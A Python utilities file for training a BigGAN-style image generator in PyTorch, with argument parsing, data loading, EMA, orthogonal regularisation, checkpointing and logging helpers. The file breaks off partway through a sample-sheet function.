refs/heads/master
| 2023-02-10T13:01:20.826060
| 2021-01-10T07:39:40
| 2021-01-10T07:39:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 52,120
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Utilities file
This file contains utility functions for bookkeeping, logging, and data loading.
Methods which directly affect training should either go in layers, the model,
or train_fns.py.
"""
from __future__ import print_function
import sys
import os
import numpy as np
import time
import datetime
import json
import pickle
from argparse import ArgumentParser
# import animal_hash
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision
import torchvision.transforms as transforms
from torch.utils.data import DataLoader
import datasets as dset
def prepare_parser():
usage = 'Parser for all scripts.'
parser = ArgumentParser(description=usage)
### Dataset/Dataloader stuff ###
parser.add_argument(
'--dataset', type=str, default='I128_hdf5',
help='Which Dataset to train on, out of I128, I256, C10, C100; '
'Append "_hdf5" to use the hdf5 version for ILSVRC '
'(default: %(default)s)')
parser.add_argument(
'--augment', action='store_true', default=False,
help='Augment with random crops and flips (default: %(default)s)')
parser.add_argument(
'--num_workers', type=int, default=8,
help='Number of dataloader workers; consider using less for HDF5 '
'(default: %(default)s)')
parser.add_argument(
'--no_pin_memory', action='store_false', dest='pin_memory', default=True,
help='Pin data into memory through dataloader? (default: %(default)s)')
parser.add_argument(
'--shuffle', action='store_true', default=False,
help='Shuffle the data (strongly recommended)? (default: %(default)s)')
parser.add_argument(
'--load_in_mem', action='store_true', default=False,
help='Load all data into memory? (default: %(default)s)')
parser.add_argument(
'--use_multiepoch_sampler', action='store_true', default=False,
help='Use the multi-epoch sampler for dataloader? (default: %(default)s)')
### Model stuff ###
parser.add_argument(
'--model', type=str, default='BigGAN',
help='Name of the model module (default: %(default)s)')
parser.add_argument(
'--G_param', type=str, default='SN',
help='Parameterization style to use for G, spectral norm (SN) or SVD (SVD)'
' or None (default: %(default)s)')
parser.add_argument(
'--D_param', type=str, default='SN',
help='Parameterization style to use for D, spectral norm (SN) or SVD (SVD)'
' or None (default: %(default)s)')
parser.add_argument(
'--G_ch', type=int, default=64,
help='Channel multiplier for G (default: %(default)s)')
parser.add_argument(
'--D_ch', type=int, default=64,
help='Channel multiplier for D (default: %(default)s)')
parser.add_argument(
'--G_depth', type=int, default=1,
help='Number of resblocks per stage in G? (default: %(default)s)')
parser.add_argument(
'--D_depth', type=int, default=1,
help='Number of resblocks per stage in D? (default: %(default)s)')
parser.add_argument(
'--D_thin', action='store_false', dest='D_wide', default=True,
help='Use the SN-GAN channel pattern for D? (default: %(default)s)')
parser.add_argument(
'--G_shared', action='store_true', default=False,
help='Use shared embeddings in G? (default: %(default)s)')
parser.add_argument(
'--shared_dim', type=int, default=0,
help='G\'s shared embedding dimensionality; if 0, will be equal to dim_z. '
'(default: %(default)s)')
parser.add_argument(
'--dim_z', type=int, default=128,
help='Noise dimensionality (default: %(default)s)')
parser.add_argument(
'--z_var', type=float, default=1.0,
help='Noise variance (default: %(default)s)')
parser.add_argument(
'--hier', action='store_true', default=False,
help='Use hierarchical z in G? (default: %(default)s)')
parser.add_argument(
'--cross_replica', action='store_true', default=False,
help='Cross_replica batchnorm in G? (default: %(default)s)')
parser.add_argument(
'--mybn', action='store_true', default=False,
help='Use my batchnorm (which supports standing stats?) (default: %(default)s)')
parser.add_argument(
'--G_nl', type=str, default='relu',
help='Activation function for G (default: %(default)s)')
parser.add_argument(
'--D_nl', type=str, default='relu',
help='Activation function for D (default: %(default)s)')
parser.add_argument(
'--G_attn', type=str, default='64',
help='What resolutions to use attention on for G (underscore separated) '
'(default: %(default)s)')
parser.add_argument(
'--D_attn', type=str, default='64',
help='What resolutions to use attention on for D (underscore separated) '
'(default: %(default)s)')
parser.add_argument(
'--norm_style', type=str, default='bn',
help='Normalizer style for G, one of bn [batchnorm], in [instancenorm], '
'ln [layernorm], gn [groupnorm] (default: %(default)s)')
### Model init stuff ###
parser.add_argument(
'--seed', type=int, default=0,
help='Random seed to use; affects both initialization and '
' dataloading. (default: %(default)s)')
parser.add_argument(
'--G_init', type=str, default='ortho',
help='Init style to use for G (default: %(default)s)')
parser.add_argument(
'--D_init', type=str, default='ortho',
help='Init style to use for D (default: %(default)s)')
parser.add_argument(
'--skip_init', action='store_true', default=False,
help='Skip initialization, ideal for testing when ortho init was used '
'(default: %(default)s)')
### Optimizer stuff ###
parser.add_argument(
'--G_lr', type=float, default=5e-5,
help='Learning rate to use for Generator (default: %(default)s)')
parser.add_argument(
'--D_lr', type=float, default=2e-4,
help='Learning rate to use for Discriminator (default: %(default)s)')
parser.add_argument(
'--G_B1', type=float, default=0.0,
help='Beta1 to use for Generator (default: %(default)s)')
parser.add_argument(
'--D_B1', type=float, default=0.0,
help='Beta1 to use for Discriminator (default: %(default)s)')
parser.add_argument(
'--G_B2', type=float, default=0.999,
help='Beta2 to use for Generator (default: %(default)s)')
parser.add_argument(
'--D_B2', type=float, default=0.999,
help='Beta2 to use for Discriminator (default: %(default)s)')
### Batch size, parallel, and precision stuff ###
parser.add_argument(
'--batch_size', type=int, default=64,
help='Default overall batchsize (default: %(default)s)')
parser.add_argument(
'--G_batch_size', type=int, default=0,
help='Batch size to use for G; if 0, same as D (default: %(default)s)')
parser.add_argument(
'--num_G_accumulations', type=int, default=1,
help='Number of passes to accumulate G\'s gradients over '
'(default: %(default)s)')
parser.add_argument(
'--num_D_steps', type=int, default=2,
help='Number of D steps per G step (default: %(default)s)')
parser.add_argument(
'--num_D_accumulations', type=int, default=1,
help='Number of passes to accumulate D\'s gradients over '
'(default: %(default)s)')
parser.add_argument(
'--split_D', action='store_true', default=False,
help='Run D twice rather than concatenating inputs? (default: %(default)s)')
parser.add_argument(
'--num_epochs', type=int, default=100,
help='Number of epochs to train for (default: %(default)s)')
parser.add_argument(
'--parallel', action='store_true', default=False,
help='Train with multiple GPUs (default: %(default)s)')
parser.add_argument(
'--G_fp16', action='store_true', default=False,
help='Train with half-precision in G? (default: %(default)s)')
parser.add_argument(
'--D_fp16', action='store_true', default=False,
help='Train with half-precision in D? (default: %(default)s)')
parser.add_argument(
'--D_mixed_precision', action='store_true', default=False,
help='Train with half-precision activations but fp32 params in D? '
'(default: %(default)s)')
parser.add_argument(
'--G_mixed_precision', action='store_true', default=False,
help='Train with half-precision activations but fp32 params in G? '
'(default: %(default)s)')
parser.add_argument(
'--accumulate_stats', action='store_true', default=False,
help='Accumulate "standing" batchnorm stats? (default: %(default)s)')
parser.add_argument(
'--num_standing_accumulations', type=int, default=16,
help='Number of forward passes to use in accumulating standing stats? '
'(default: %(default)s)')
### Bookkeping stuff ###
parser.add_argument(
'--G_eval_mode', action='store_true', default=False,
help='Run G in eval mode (running/standing stats?) at sample/test time? '
'(default: %(default)s)')
parser.add_argument(
'--save_every', type=int, default=2000,
help='Save every X iterations (default: %(default)s)')
parser.add_argument(
'--num_save_copies', type=int, default=2,
help='How many copies to save (default: %(default)s)')
parser.add_argument(
'--num_best_copies', type=int, default=2,
help='How many previous best checkpoints to save (default: %(default)s)')
parser.add_argument(
'--which_best', type=str, default='IS',
help='Which metric to use to determine when to save new "best" '
'checkpoints, one of IS or FID (default: %(default)s)')
parser.add_argument(
'--no_fid', action='store_true', default=False,
help='Calculate IS only, not FID? (default: %(default)s)')
parser.add_argument(
'--test_every', type=int, default=5000,
help='Test every X iterations (default: %(default)s)')
parser.add_argument(
'--num_inception_images', type=int, default=50000,
help='Number of samples to compute inception metrics with '
'(default: %(default)s)')
parser.add_argument(
'--hashname', action='store_true', default=False,
help='Use a hash of the experiment name instead of the full config '
'(default: %(default)s)')
parser.add_argument(
'--base_root', type=str, default='',
help='Default location to store all weights, samples, data, and logs '
' (default: %(default)s)')
parser.add_argument(
'--data_root', type=str, default='data',
help='Default location where data is stored (default: %(default)s)')
parser.add_argument(
'--weights_root', type=str, default='weights',
help='Default location to store weights (default: %(default)s)')
parser.add_argument(
'--logs_root', type=str, default='logs',
help='Default location to store logs (default: %(default)s)')
parser.add_argument(
'--samples_root', type=str, default='samples',
help='Default location to store samples (default: %(default)s)')
parser.add_argument(
'--pbar', type=str, default='mine',
help='Type of progressbar to use; one of "mine" or "tqdm" '
'(default: %(default)s)')
parser.add_argument(
'--name_suffix', type=str, default='',
help='Suffix for experiment name for loading weights for sampling '
'(consider "best0") (default: %(default)s)')
parser.add_argument(
'--experiment_name', type=str, default='',
help='Optionally override the automatic experiment naming with this arg. '
'(default: %(default)s)')
parser.add_argument(
'--config_from_name', action='store_true', default=False,
help='Use a hash of the experiment name instead of the full config '
'(default: %(default)s)')
### EMA Stuff ###
parser.add_argument(
'--ema', action='store_true', default=False,
help='Keep an ema of G\'s weights? (default: %(default)s)')
parser.add_argument(
'--ema_decay', type=float, default=0.9999,
help='EMA decay rate (default: %(default)s)')
parser.add_argument(
'--use_ema', action='store_true', default=False,
help='Use the EMA parameters of G for evaluation? (default: %(default)s)')
parser.add_argument(
'--ema_start', type=int, default=0,
help='When to start updating the EMA weights (default: %(default)s)')
### Numerical precision and SV stuff ###
parser.add_argument(
'--adam_eps', type=float, default=1e-8,
help='epsilon value to use for Adam (default: %(default)s)')
parser.add_argument(
'--BN_eps', type=float, default=1e-5,
help='epsilon value to use for BatchNorm (default: %(default)s)')
parser.add_argument(
'--SN_eps', type=float, default=1e-8,
help='epsilon value to use for Spectral Norm (default: %(default)s)')
parser.add_argument(
'--num_G_SVs', type=int, default=1,
help='Number of SVs to track in G (default: %(default)s)')
parser.add_argument(
'--num_D_SVs', type=int, default=1,
help='Number of SVs to track in D (default: %(default)s)')
parser.add_argument(
'--num_G_SV_itrs', type=int, default=1,
help='Number of SV itrs in G (default: %(default)s)')
parser.add_argument(
'--num_D_SV_itrs', type=int, default=1,
help='Number of SV itrs in D (default: %(default)s)')
### Ortho reg stuff ###
parser.add_argument(
'--G_ortho', type=float, default=0.0, # 1e-4 is default for BigGAN
help='Modified ortho reg coefficient in G (default: %(default)s)')
parser.add_argument(
'--D_ortho', type=float, default=0.0,
help='Modified ortho reg coefficient in D (default: %(default)s)')
parser.add_argument(
'--toggle_grads', action='store_true', default=True,
help='Toggle D and G\'s "requires_grad" settings when not training them? '
' (default: %(default)s)')
### Which train function ###
parser.add_argument(
'--which_train_fn', type=str, default='GAN',
help='How2trainyourbois (default: %(default)s)')
### Resume training stuff
parser.add_argument(
'--load_weights', type=str, default='',
help='Suffix for which weights to load (e.g. best0, copy0) '
'(default: %(default)s)')
parser.add_argument(
'--resume', action='store_true', default=False,
help='Resume training? (default: %(default)s)')
### Log stuff ###
parser.add_argument(
'--logstyle', type=str, default='%3.3e',
help='What style to use when logging training metrics? '
'One of: %#.#f/ %#.#e (float/exp, text), '
'pickle (python pickle), '
'npz (numpy zip), '
'mat (MATLAB .mat file) (default: %(default)s)')
parser.add_argument(
'--log_G_spectra', action='store_true', default=False,
help='Log the top 3 singular values in each SN layer in G? '
'(default: %(default)s)')
parser.add_argument(
'--log_D_spectra', action='store_true', default=False,
help='Log the top 3 singular values in each SN layer in D? '
'(default: %(default)s)')
parser.add_argument(
'--sv_log_interval', type=int, default=10,
help='Iteration interval for logging singular values '
' (default: %(default)s)')
return parser
# Arguments for sample.py; not presently used in train.py
def add_sample_parser(parser):
parser.add_argument(
'--sample_npz', action='store_true', default=False,
help='Sample "sample_num_npz" images and save to npz? '
'(default: %(default)s)')
parser.add_argument(
'--sample_num_npz', type=int, default=50000,
help='Number of images to sample when sampling NPZs '
'(default: %(default)s)')
parser.add_argument(
'--sample_sheets', action='store_true', default=False,
help='Produce class-conditional sample sheets and stick them in '
'the samples root? (default: %(default)s)')
parser.add_argument(
'--sample_interps', action='store_true', default=False,
help='Produce interpolation sheets and stick them in '
'the samples root? (default: %(default)s)')
parser.add_argument(
'--sample_sheet_folder_num', type=int, default=-1,
help='Number to use for the folder for these sample sheets '
'(default: %(default)s)')
parser.add_argument(
'--sample_random', action='store_true', default=False,
help='Produce a single random sheet? (default: %(default)s)')
parser.add_argument(
'--sample_trunc_curves', type=str, default='',
help='Get inception metrics with a range of variances? '
'To use this, specify a startpoint, step, and endpoint, e.g. '
'--sample_trunc_curves 0.2_0.1_1.0 for a startpoint of 0.2, '
'a stepsize of 0.1, and an endpoint of 1.0. Note that this is '
'not exactly identical to using tf.truncated_normal, but should '
'have approximately the same effect. (default: %(default)s)')
parser.add_argument(
'--sample_inception_metrics', action='store_true', default=False,
help='Calculate Inception metrics with sample.py? (default: %(default)s)')
return parser
# Convenience dicts
dset_dict = {'I32': dset.ImageFolder, 'I64': dset.ImageFolder,
'I128': dset.ImageFolder, 'I256': dset.ImageFolder,
'I32_hdf5': dset.ILSVRC_HDF5, 'I64_hdf5': dset.ILSVRC_HDF5,
'I128_hdf5': dset.ILSVRC_HDF5, 'I256_hdf5': dset.ILSVRC_HDF5,
'C10': dset.CIFAR10, 'C100': dset.CIFAR100}
imsize_dict = {'I32': 32, 'I32_hdf5': 32,
'I64': 64, 'I64_hdf5': 64,
'I128': 128, 'I128_hdf5': 128,
'I256': 256, 'I256_hdf5': 256,
'C10': 32, 'C100': 32}
root_dict = {'I32': 'ImageNet', 'I32_hdf5': 'ILSVRC32.hdf5',
'I64': 'ImageNet', 'I64_hdf5': 'ILSVRC64.hdf5',
'I128': 'ImageNet', 'I128_hdf5': 'ILSVRC128.hdf5',
'I256': 'ImageNet', 'I256_hdf5': 'ILSVRC256.hdf5',
'C10': 'CIFAR10', 'C100': 'cifar100'}
nclass_dict = {'I32': 1000, 'I32_hdf5': 1000,
'I64': 1000, 'I64_hdf5': 1000,
'I128': 1000, 'I128_hdf5': 1000,
'I256': 1000, 'I256_hdf5': 1000,
'C10': 10, 'C100': 100}
# Number of classes to put per sample sheet
classes_per_sheet_dict = {'I32': 50, 'I32_hdf5': 50,
'I64': 50, 'I64_hdf5': 50,
'I128': 20, 'I128_hdf5': 20,
'I256': 20, 'I256_hdf5': 20,
'C10': 10, 'C100': 100}
activation_dict = {'inplace_relu': nn.ReLU(inplace=True),
'relu': nn.ReLU(inplace=False),
'ir': nn.ReLU(inplace=True), }
class CenterCropLongEdge(object):
"""Crops the given PIL Image on the long edge.
Args:
size (sequence or int): Desired output size of the crop. If size is an
int instead of sequence like (h, w), a square crop (size, size) is
made.
"""
def __call__(self, img):
"""
Args:
img (PIL Image): Image to be cropped.
Returns:
PIL Image: Cropped image.
"""
return transforms.functional.center_crop(img, min(img.size))
def __repr__(self):
return self.__class__.__name__
class RandomCropLongEdge(object):
"""Crops the given PIL Image on the long edge with a random start point.
Args:
size (sequence or int): Desired output size of the crop. If size is an
int instead of sequence like (h, w), a square crop (size, size) is
made.
"""
def __call__(self, img):
"""
Args:
img (PIL Image): Image to be cropped.
Returns:
PIL Image: Cropped image.
"""
size = (min(img.size), min(img.size))
# Only step forward along this edge if it's the long edge
i = (0 if size[0] == img.size[0]
else np.random.randint(low=0, high=img.size[0] - size[0]))
j = (0 if size[1] == img.size[1]
else np.random.randint(low=0, high=img.size[1] - size[1]))
return transforms.functional.crop(img, i, j, size[0], size[1])
def __repr__(self):
return self.__class__.__name__
# multi-epoch Dataset sampler to avoid memory leakage and enable resumption of
# training from the same sample regardless of whether we stop mid-epoch
class MultiEpochSampler(torch.utils.data.Sampler):
r"""Samples elements randomly over multiple epochs
Arguments:
data_source (Dataset): dataset to sample from
num_epochs (int) : Number of times to loop over the dataset
start_itr (int) : which iteration to begin from
"""
def __init__(self, data_source, num_epochs, start_itr=0, batch_size=128):
self.data_source = data_source
self.num_samples = len(self.data_source)
self.num_epochs = num_epochs
self.start_itr = start_itr
self.batch_size = batch_size
if not isinstance(self.num_samples, int) or self.num_samples <= 0:
raise ValueError("num_samples should be a positive integeral "
"value, but got num_samples={}".format(self.num_samples))
def __iter__(self):
n = len(self.data_source)
# Determine number of epochs
num_epochs = int(np.ceil((n * self.num_epochs
- (self.start_itr * self.batch_size)) / float(n)))
# Sample all the indices, and then grab the last num_epochs index sets;
# This ensures if we're starting at epoch 4, we're still grabbing epoch 4's
# indices
out = [torch.randperm(n) for epoch in range(self.num_epochs)][-num_epochs:]
# Ignore the first start_itr % n indices of the first epoch
out[0] = out[0][(self.start_itr * self.batch_size % n):]
# if self.replacement:
# return iter(torch.randint(high=n, size=(self.num_samples,), dtype=torch.int64).tolist())
# return iter(.tolist())
output = torch.cat(out).tolist()
print('Length dataset output is %d' % len(output))
return iter(output)
def __len__(self):
return len(self.data_source) * self.num_epochs - self.start_itr * self.batch_size
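# Hedged usage sketch (an assumption; mirrors how get_data_loaders below wires
# the sampler in, so training resumes from the same sample mid-epoch):
#
# sampler = MultiEpochSampler(train_set, num_epochs=100, start_itr=5000,
#                             batch_size=64)
# loader = DataLoader(train_set, batch_size=64, sampler=sampler)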
# Convenience function to centralize all data loaders
def get_data_loaders(dataset, data_root=None, augment=False, batch_size=64,
num_workers=8, shuffle=True, load_in_mem=False, hdf5=False,
pin_memory=True, drop_last=True, start_itr=0,
num_epochs=500, use_multiepoch_sampler=False,
**kwargs):
# Append /FILENAME.hdf5 to root if using hdf5
data_root += '/%s' % root_dict[dataset]
print('Using dataset root location %s' % data_root)
which_dataset = dset_dict[dataset]
norm_mean = [0.5, 0.5, 0.5]
norm_std = [0.5, 0.5, 0.5]
image_size = imsize_dict[dataset]
# For image folder datasets, name of the file where we store the precomputed
# image locations to avoid having to walk the dirs every time we load.
dataset_kwargs = {'index_filename': '%s_imgs.npz' % dataset}
# HDF5 datasets have their own inbuilt transform; no train_transform needed
if 'hdf5' in dataset:
train_transform = None
else:
if augment:
print('Data will be augmented...')
if dataset in ['C10', 'C100']:
train_transform = [transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip()]
else:
train_transform = [RandomCropLongEdge(),
transforms.Resize(image_size),
transforms.RandomHorizontalFlip()]
else:
print('Data will not be augmented...')
if dataset in ['C10', 'C100']:
train_transform = []
else:
train_transform = [CenterCropLongEdge(), transforms.Resize(image_size)]
# train_transform = [transforms.Resize(image_size), transforms.CenterCrop]
train_transform = transforms.Compose(train_transform + [
transforms.ToTensor(),
transforms.Normalize(norm_mean, norm_std)])
train_set = which_dataset(root=data_root, transform=train_transform,
load_in_mem=load_in_mem, **dataset_kwargs)
# Prepare loader; the loaders list is for forward compatibility with
# using validation / test splits.
loaders = []
if use_multiepoch_sampler:
print('Using multiepoch sampler from start_itr %d...' % start_itr)
loader_kwargs = {'num_workers': num_workers, 'pin_memory': pin_memory}
sampler = MultiEpochSampler(train_set, num_epochs, start_itr, batch_size)
train_loader = DataLoader(train_set, batch_size=batch_size,
sampler=sampler, **loader_kwargs)
else:
loader_kwargs = {'num_workers': num_workers, 'pin_memory': pin_memory,
'drop_last': drop_last} # Default, drop last incomplete batch
train_loader = DataLoader(train_set, batch_size=batch_size,
shuffle=shuffle, **loader_kwargs)
loaders.append(train_loader)
return loaders
# Utility file to seed rngs
def seed_rng(seed):
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
np.random.seed(seed)
# Utility to peg all roots to a base root
# If a base root folder is provided, peg all other root folders to it.
def update_config_roots(config):
if config['base_root']:
print('Pegging all root folders to base root %s' % config['base_root'])
for key in ['weights', 'logs', 'samples']:
config['%s_root' % key] = '%s/%s' % (config['base_root'], key)
return config
# Utility to prepare root folders if they don't exist; parent folder must exist
def prepare_root(config):
for key in ['weights_root', 'logs_root', 'samples_root']:
if not os.path.exists(config[key]):
print('Making directory %s for %s...' % (config[key], key))
os.mkdir(config[key])
# Simple wrapper that applies EMA to a model. Could be better done in 1.0 using
# the parameters() and buffers() module functions, but for now this works
# with state_dicts using .copy_
class ema(object):
def __init__(self, source, target, decay=0.9999, start_itr=0):
self.source = source
self.target = target
self.decay = decay
# Optional parameter indicating what iteration to start the decay at
self.start_itr = start_itr
# Initialize target's params to be source's
self.source_dict = self.source.state_dict()
self.target_dict = self.target.state_dict()
print('Initializing EMA parameters to be source parameters...')
with torch.no_grad():
for key in self.source_dict:
self.target_dict[key].data.copy_(self.source_dict[key].data)
# target_dict[key].data = source_dict[key].data # Doesn't work!
def update(self, itr=None):
# If an iteration counter is provided and itr is less than the start itr,
# peg the ema weights to the underlying weights.
if itr and itr < self.start_itr:
decay = 0.0
else:
decay = self.decay
with torch.no_grad():
for key in self.source_dict:
self.target_dict[key].data.copy_(self.target_dict[key].data * decay
+ self.source_dict[key].data * (1 - decay))
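# Hedged usage sketch (an assumption): pair the live G with its EMA copy and
# call update() once per training iteration.
#
# ema_ = ema(G, G_ema, decay=config['ema_decay'], start_itr=config['ema_start'])
# ema_.update(state_dict['itr'])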
# Apply modified ortho reg to a model
# This function is an optimized version that directly computes the gradient,
# instead of computing and then differentiating the loss.
def ortho(model, strength=1e-4, blacklist=[]):
with torch.no_grad():
for param in model.parameters():
# Only apply this to parameters with at least 2 axes, and not in the blacklist
if len(param.shape) < 2 or any([param is item for item in blacklist]):
continue
w = param.view(param.shape[0], -1)
grad = (2 * torch.mm(torch.mm(w, w.t())
* (1. - torch.eye(w.shape[0], device=w.device)), w))
param.grad.data += strength * grad.view(param.shape)
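# Hedged equivalence sketch (an assumption): the gradient above is
# proportional to that of the penalty strength * ||W W^T * (1 - I)||_F^2,
# which could instead be added to the loss and autograd-differentiated,
# at extra cost:
#
# def ortho_loss(model, strength=1e-4):
#     loss = 0.
#     for param in model.parameters():
#         if len(param.shape) < 2:
#             continue
#         w = param.view(param.shape[0], -1)
#         wwt = torch.mm(w, w.t()) * (1. - torch.eye(w.shape[0], device=w.device))
#         loss = loss + strength * (wwt ** 2).sum()
#     return loss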
# Default ortho reg
# This function is an optimized version that directly computes the gradient,
# instead of computing and then differentiating the loss.
def default_ortho(model, strength=1e-4, blacklist=[]):
with torch.no_grad():
for param in model.parameters():
# Only apply this to parameters with at least 2 axes & not in blacklist
if len(param.shape) < 2 or param in blacklist:
continue
w = param.view(param.shape[0], -1)
grad = (2 * torch.mm(torch.mm(w, w.t())
- torch.eye(w.shape[0], device=w.device), w))
param.grad.data += strength * grad.view(param.shape)
# Convenience utility to switch off requires_grad
def toggle_grad(model, on_or_off):
for param in model.parameters():
param.requires_grad = on_or_off
# Function to join strings or ignore them
# Base string is the string to link "strings," while strings
# is a list of strings or Nones.
def join_strings(base_string, strings):
return base_string.join([item for item in strings if item])
# Save a model's weights, optimizer, and the state_dict
def save_weights(G, D, state_dict, weights_root, experiment_name,
name_suffix=None, G_ema=None):
root = '/'.join([weights_root, experiment_name])
if not os.path.exists(root):
os.mkdir(root)
if name_suffix:
print('Saving weights to %s/%s...' % (root, name_suffix))
else:
print('Saving weights to %s...' % root)
torch.save(G.state_dict(),
'%s/%s.pth' % (root, join_strings('_', ['G', name_suffix])))
torch.save(G.optim.state_dict(),
'%s/%s.pth' % (root, join_strings('_', ['G_optim', name_suffix])))
torch.save(D.state_dict(),
'%s/%s.pth' % (root, join_strings('_', ['D', name_suffix])))
torch.save(D.optim.state_dict(),
'%s/%s.pth' % (root, join_strings('_', ['D_optim', name_suffix])))
torch.save(state_dict,
'%s/%s.pth' % (root, join_strings('_', ['state_dict', name_suffix])))
if G_ema is not None:
torch.save(G_ema.state_dict(),
'%s/%s.pth' % (root, join_strings('_', ['G_ema', name_suffix])))
# Load a model's weights, optimizer, and the state_dict
def load_weights(G, D, state_dict, weights_root, experiment_name,
name_suffix=None, G_ema=None, strict=True, load_optim=True):
root = '/'.join([weights_root, experiment_name])
if name_suffix:
print('Loading %s weights from %s...' % (name_suffix, root))
else:
print('Loading weights from %s...' % root)
if G is not None:
G.load_state_dict(
torch.load('%s/%s.pth' % (root, join_strings('_', ['G', name_suffix]))),
strict=strict)
if load_optim:
G.optim.load_state_dict(
torch.load('%s/%s.pth' % (root, join_strings('_', ['G_optim', name_suffix]))))
if D is not None:
D.load_state_dict(
torch.load('%s/%s.pth' % (root, join_strings('_', ['D', name_suffix]))),
strict=strict)
if load_optim:
D.optim.load_state_dict(
torch.load('%s/%s.pth' % (root, join_strings('_', ['D_optim', name_suffix]))))
# Load state dict
for item in state_dict:
state_dict[item] = torch.load('%s/%s.pth' % (root, join_strings('_', ['state_dict', name_suffix])))[item]
if G_ema is not None:
G_ema.load_state_dict(
torch.load('%s/%s.pth' % (root, join_strings('_', ['G_ema', name_suffix]))),
strict=strict)
''' MetricsLogger originally stolen from VoxNet source code.
Used for logging inception metrics'''
class MetricsLogger(object):
def __init__(self, fname, reinitialize=False):
self.fname = fname
self.reinitialize = reinitialize
if os.path.exists(self.fname):
if self.reinitialize:
print('{} exists, deleting...'.format(self.fname))
os.remove(self.fname)
def log(self, record=None, **kwargs):
"""
Assumption: no newlines in the input.
"""
if record is None:
record = {}
record.update(kwargs)
record['_stamp'] = time.time()
with open(self.fname, 'a') as f:
f.write(json.dumps(record, ensure_ascii=True) + '\n')
# Logstyle is either:
# '%#.#f' for floating point representation in text
# '%#.#e' for exponent representation in text
# 'npz' for output to npz # NOT YET SUPPORTED
# 'pickle' for output to a python pickle # NOT YET SUPPORTED
# 'mat' for output to a MATLAB .mat file # NOT YET SUPPORTED
class MyLogger(object):
def __init__(self, fname, reinitialize=False, logstyle='%3.3f'):
self.root = fname
if not os.path.exists(self.root):
os.mkdir(self.root)
self.reinitialize = reinitialize
self.metrics = []
self.logstyle = logstyle # One of '%3.3f' or like '%3.3e'
# Delete log if re-starting and log already exists
def reinit(self, item):
if os.path.exists('%s/%s.log' % (self.root, item)):
if self.reinitialize:
# Only print the removal message for singular-value logs once
if 'sv' in item:
if not any('sv' in item for item in self.metrics):
print('Deleting singular value logs...')
else:
print('{} exists, deleting...'.format('%s_%s.log' % (self.root, item)))
os.remove('%s/%s.log' % (self.root, item))
    # Log in plaintext; this is designed for being read in MATLAB (sorry not sorry)
def log(self, itr, **kwargs):
for arg in kwargs:
if arg not in self.metrics:
if self.reinitialize:
self.reinit(arg)
self.metrics += [arg]
if self.logstyle == 'pickle':
print('Pickle not currently supported...')
# with open('%s/%s.log' % (self.root, arg), 'a') as f:
# pickle.dump(kwargs[arg], f)
elif self.logstyle == 'mat':
print('.mat logstyle not currently supported...')
else:
with open('%s/%s.log' % (self.root, arg), 'a') as f:
f.write('%d: %s\n' % (itr, self.logstyle % kwargs[arg]))
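# Minimal sketch (directory name is hypothetical): MyLogger keeps one plaintext
# file per metric, so the call below appends a line like "500: 0.873" to
# demo_logs/G_loss.log and "500: 0.640" to demo_logs/D_loss.log.
if __name__ == '__main__':
    _plog = MyLogger('demo_logs', reinitialize=True, logstyle='%3.3f')
    _plog.log(itr=500, G_loss=0.8734, D_loss=0.6401)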
# Write some metadata to the logs directory
def write_metadata(logs_root, experiment_name, config, state_dict):
with open(('%s/%s/metalog.txt' %
(logs_root, experiment_name)), 'w') as writefile:
writefile.write('datetime: %s\n' % str(datetime.datetime.now()))
writefile.write('config: %s\n' % str(config))
writefile.write('state: %s\n' % str(state_dict))
"""
Very basic progress indicator to wrap an iterable in.
Author: Jan Schlüter
Andy's adds: time elapsed in addition to ETA, makes it possible to add
estimated time to 1k iters instead of estimated time to completion.
"""
def progress(items, desc='', total=None, min_delay=0.1, displaytype='s1k'):
"""
Returns a generator over `items`, printing the number and percentage of
items processed and the estimated remaining processing time before yielding
the next item. `total` gives the total number of items (required if `items`
has no length), and `min_delay` gives the minimum time in seconds between
subsequent prints. `desc` gives an optional prefix text (end with a space).
"""
total = total or len(items)
t_start = time.time()
t_last = 0
for n, item in enumerate(items):
t_now = time.time()
if t_now - t_last > min_delay:
print("\r%s%d/%d (%6.2f%%)" % (
desc, n + 1, total, n / float(total) * 100), end=" ")
if n > 0:
if displaytype == 's1k': # minutes/seconds for 1000 iters
next_1000 = n + (1000 - n % 1000)
t_done = t_now - t_start
t_1k = t_done / n * next_1000
outlist = list(divmod(t_done, 60)) + list(divmod(t_1k - t_done, 60))
print("(TE/ET1k: %d:%02d / %d:%02d)" % tuple(outlist), end=" ")
else: # displaytype == 'eta':
t_done = t_now - t_start
t_total = t_done / n * total
outlist = list(divmod(t_done, 60)) + list(divmod(t_total - t_done, 60))
print("(TE/ETA: %d:%02d / %d:%02d)" % tuple(outlist), end=" ")
sys.stdout.flush()
t_last = t_now
yield item
t_total = time.time() - t_start
print("\r%s%d/%d (100.00%%) (took %d:%02d)" % ((desc, total, total) +
divmod(t_total, 60)))
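# Sketch: wrap any sized iterable; displaytype='eta' reports time elapsed and
# estimated time to completion instead of the default time-to-next-1k-iters.
if __name__ == '__main__':
    for _ in progress(range(5), desc='demo ', displaytype='eta'):
        time.sleep(0.1)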
# Sample function for use with inception metrics
def sample(G, z_, y_, config):
with torch.no_grad():
z_.sample_()
y_.sample_()
if config['parallel']:
G_z = nn.parallel.data_parallel(G, (z_, G.shared(y_)))
else:
G_z = G(z_, G.shared(y_))
return G_z, y_
# Sample function for sample sheets
def sample_sheet(G, classes_per_sheet, num_classes, samples_per_class, parallel,
samples_root, experiment_name, folder_number, z_=None):
# Prepare sample directory
if not os.path.isdir('%s/%s' % (samples_root, experiment_name)):
os.mkdir('%s/%s' % (samples_root, experiment_name))
if not os.path.isdir('%s/%s/%d' % (samples_root, experiment_name, folder_number)):
os.mkdir('%s/%s/%d' % (samples_root, experiment_name, folder_number))
# loop over total number of sheets
for i in range(num_classes // classes_per_sheet):
ims = []
y = torch.arange(i * classes_per_sheet, (i + 1) * classes_per_sheet, device='cuda')
for j in range(samples_per_class):
if (z_ is not None) and hasattr(z_, 'sample_') and classes_per_sheet <= z_.size(0):
z_.sample_()
else:
z_ = torch.randn(classes_per_sheet, G.dim_z, device='cuda')
with torch.no_grad():
if parallel:
o = nn.parallel.data_parallel(G, (z_[:classes_per_sheet], G.shared(y)))
else:
o = G(z_[:classes_per_sheet], G.shared(y))
ims += [o.data.cpu()]
# This line should properly unroll the images
